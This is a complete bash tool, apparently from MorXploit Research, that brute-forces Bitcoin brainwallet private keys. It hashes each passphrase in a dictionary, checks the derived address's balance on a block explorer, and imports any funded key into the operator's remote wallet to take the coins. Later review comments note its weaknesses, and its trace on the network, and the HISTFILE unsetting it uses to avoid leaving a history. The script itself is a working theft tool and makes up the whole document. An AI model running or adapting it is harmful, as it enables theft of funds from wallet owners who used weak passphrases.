#!/bin/bash
#
# Tool: MorXCoinPwn
# Author: Simo Ben youssef
# Contact: <simo_at_morxploit_com>
# Coded: 1 September 2013
# Published: 28 February 2014
# MorXploit Research
# http://www.morxploit.com
#
# Description:
# Mass Bitcoin private keys brute forcing/Take over tool.
# Read related paper at http://www.morxploit.com/morxpapers/smashingbitcoins.pdf
#
# Requirements:
# bitcoind, python and keyfmt which could be downloaded from http://www.morxploit.com/morxtools/keyfmt
# A wallet account at blockchain.info
# Tested to work on Linux Ubuntu.
#
# Author disclaimer:
# This code and all information contained in this entire document is for educational, demonstration and testing purposes only.
# I cannot be held responsible for any malicious use. Use at your own risk.
# USE ONLY ON PASSPHRASES THAT YOU OWN ALREADY.

# --- Configuration -----------------------------------------------------------
# Path to the bitcoind binary invoked for the importprivkey call.
bitcoind='/usr/bin/bitcoind'
# Block explorer host queried for address lookups.
host='blockexplorer.com'
# Remote RPC endpoint that bitcoind is pointed at.
rpchost='rpc.blockchain.info'

# Change to your blockchain account login and pass.
# NOTE(review): these are stored in the script in plain text, so anyone who can
# read the file can read the account credentials.
username='yourblockchainusername'
password='yourblockchainpassword'

# Clear the terminal and print the tool's banner followed by one blank line.
# Outputs: six lines on stdout (five banner lines and an empty line).
banner() {
  /usr/bin/clear
  printf '%s\n' \
    "####################################################" \
    "##       MorXCoin Bitcoin take-over PoC tool      ##" \
    "## By Simo Ben youssef <Simo_at_Morxploit_dot_com ##" \
    "##          http://www.morpxloit.com              ##" \
    "####################################################" \
    ""
}

# Pre-flight check: stop unless both /usr/bin/morxkeyfmt and the configured
# bitcoind binary exist as regular files.
if ! [[ -f /usr/bin/morxkeyfmt && -f $bitcoind ]]; then
  /usr/bin/clear
  banner
  printf '%s\n' "[-] either keyfmt or bitcoind were not found. RTFM!" ""
  exit
fi

# Base58 alphabet: digits and letters without 0, O, I and l.
base58=({1..9} {A..H} {J..N} {P..Z} {a..k} {m..z})

# Encode a hexadecimal number as Base58.
# Arguments: $1 - hex string (upper-cased before it is handed to bc)
# Outputs:   the Base58 text on stdout, without a trailing newline
# bc emits the base-58 digits least-significant first, so each symbol is
# prepended to the result. The loop runs only while the value is above zero,
# so a zero value (and any leading zero bytes) produces no output symbols.
encodeBase58() {
  local digit encoded=""
  while read -r digit; do
    encoded="${base58[digit]}${encoded}"
  done < <(bc <<<"ibase=16; n=${1^^}; while(n>0) { n%3A ; n/=3A }")
  printf '%s' "$encoded"
}

# Turn a passphrase into a Base58Check-encoded private key (the 0x80 prefix and
# 4-byte double-SHA-256 checksum match the Wallet Import Format layout).
# Arguments: $1 - passphrase; it is expanded unquoted below, so the shell
#                 word-splits and globs it before it is hashed
# Globals:   writes a, b, c, d, e, f and enc (enc holds the encoded key)
# Requires:  sha256sum, cut, xxd and encodeBase58 from this file
#
# Security note: the key is nothing more than one unsalted SHA-256 of the
# passphrase, so a key made this way is exactly as guessable as the passphrase.
# That is the weakness the header's paper reference is about; keys drawn from a
# cryptographically secure random source do not share it.
PrivateKey() {
# a: hex SHA-256 digest of the passphrase (first 64 characters of the output)
a=$(echo -n $1 | sha256sum)
a=$(echo $a | cut -c 1-64)
# b: digest with the 0x80 prefix byte in front
b="80$a";
# c: SHA-256 over the raw bytes of b (xxd -r -p turns the hex back into bytes)
c=$(echo -n $b | xxd -r -p | sha256sum -b)
c=$(echo $c | cut -c 1-64)
# d: SHA-256 over the raw bytes of c, i.e. the second round of the checksum hash
d=$(echo -n $c | xxd -r -p | sha256sum -b)
d=$(echo $d | cut -c 1-64)
# e: first 8 hex characters (4 bytes) of d, used as the checksum
e=$(echo $d | cut -c 1-8)
# f: prefixed digest followed by the checksum; enc is f in Base58
f=$b$e
enc=$(encodeBase58 $f)
}

# Convert an encoded private key into an address using the external keyfmt
# script named in the header's Requirements.
# Arguments: $1 - encoded key, written to keyfmt's stdin
# Globals:   writes btcaddress with keyfmt's stdout
# keyfmt is given as a relative name, so python looks for it in the current
# working directory.
# NOTE(review): "%a" is presumably keyfmt's address format specifier - confirm
# against keyfmt itself.
PrivateToAddress() {
btcaddress=$(echo -n $1 | python keyfmt %a)
}

# Argument handling: both a passphrase file ($1) and a query method ($2) are
# required, and the method must be one of the two names accepted below.
if ! [[ -n "$1" && -n "$2" ]]; then
  banner
  /bin/echo "Usage: $0 <passphrase file> <method>"
  /bin/echo "Exp: $0 l33t.dic addressbalance"
  /bin/echo "Or: $0 l33t.dic getreceivedbyaddress"
  exit
fi

case "$2" in
  addressbalance | getreceivedbyaddress)
    ;;
  *)
    banner
    /bin/echo "[-] You need specifiy either addressbalance or getreceivedbyaddress as method"
    exit
    ;;
esac

# Start-up summary of the settings in effect for this run.
/usr/bin/clear
banner
/bin/echo "[*] Passphrases file set to $1"
/bin/echo "[*] Bitcoind set to $bitcoind"
/bin/echo "[*] Method set to $2"
/bin/echo "[*] Take-over started!"

# Look up one address on the configured block explorer.
# Arguments: $1 - address, $2 - query method (used as a URL path segment)
# Globals:   reads host; writes balance with the raw response body
# The URL carries no scheme, so wget falls back to its default (plain HTTP) and
# the response is neither encrypted nor authenticated.
# Defender note: every candidate produces one request of the form
# <host>/q/<method>/<address>; a long sequential run of such requests from one
# client is the network-visible trace of this script.
CheckBalance() {
balance=$(wget -q -O - $host/q/$2/$1)
}

# Unset HISTFILE, the variable bash uses to locate its history file.
# NOTE(review): scripts usually do this to avoid leaving a command-history
# trail; treat it as a triage indicator when a script like this is found on a
# host.
unset HISTFILE

# Main loop: one candidate passphrase per line of the file named by $1.
# Each line is turned into a key (PrivateKey), the key into an address
# (PrivateToAddress), and the address is looked up (CheckBalance) with the
# method given in $2.
line=0
while read word; do
line=$(( $line + 1 ))

PrivateKey "$word"
PrivateToAddress $enc
CheckBalance $btcaddress $2

# The lookup response is tested against 0 with the `>` operator of [[ ]].
if [[ $balance > 0 ]]
then
echo "Got => $btcaddress - Balance: $balance"
echo "Importing now =)"
# Imports the derived key into the wallet reached at $rpchost on port 443.
# Whoever holds an imported key controls the funds at its address; the header's
# disclaimer limits use to passphrases you already own.
# The RPC user name, RPC password and the private key are all passed as
# command-line arguments, so they are present in the process's argument list
# (process listings, exec audit logs).
$bitcoind -rpcconnect=$rpchost -rpcport=443 -rpcssl -rpcuser=$username -rpcpassword=$password importprivkey $enc 
# Or locally, you pick =)
#$bitcoind importprivkey $enc "" false
fi

# Progress output: number of lines processed so far.
echo "=> $line"
done < $1
echo "All done"
